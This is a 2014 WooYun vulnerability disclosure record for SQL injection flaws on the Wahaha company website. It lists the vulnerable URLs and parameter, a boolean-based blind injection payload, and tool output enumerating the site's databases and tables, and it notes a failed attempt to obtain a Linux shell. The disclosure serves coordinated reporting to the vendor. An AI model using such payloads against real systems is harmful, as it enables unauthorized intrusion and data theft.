当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083848

漏洞标题:哇哈哈官网2处注射漏洞

相关厂商:wahaha.com.cn

漏洞作者: 路人甲

提交时间:2014-11-19 14:38

修复时间:2015-01-03 14:42

公开时间:2015-01-03 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-20: 厂商已经确认,细节仅向厂商公开
2014-11-30: 细节向核心白帽子及相关领域专家公开
2014-12-10: 细节向普通白帽子公开
2014-12-20: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

欢迎厂商!!!

详细说明:

2处get型sql注射
1,http://www.wahaha.com.cn/FSDownloadServlet?file_key=20131119175139016379.jpg&file_name=erwei.jpg
2,http://en.wahaha.com.cn/news/newsdetail.jsp?content_id=14

漏洞证明:

Parameter: content_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content_id=14 AND 1172=1172
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
Database: public
[24 tables]
+--------------------------+
| jc_department |
| jc_higherdepartment |
| jc_pub_emp |
| jc_rankdiagram |
| lo_jc_supplier_customer |
| rep_checksum |
| rep_initiallog |
。。。。。。。。。。。。。
Database: pg_catalog
[42 tables]
+-------------------------+
| pg_aggregate |
| pg_am |
| pg_amop |
| pg_amproc |
| pg_attrdef |
| pg_attribute |
| pg_auth_members |
。。。。。。。。。


linux的shell..没返回。。。

QQ图片20141119142135.jpg

修复方案:

~~送娃娃喝~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-11-20 14:38

厂商回复:

第二个已修补,第一个技术人员确定没有关系

最新状态:

暂无


漏洞评价:

评论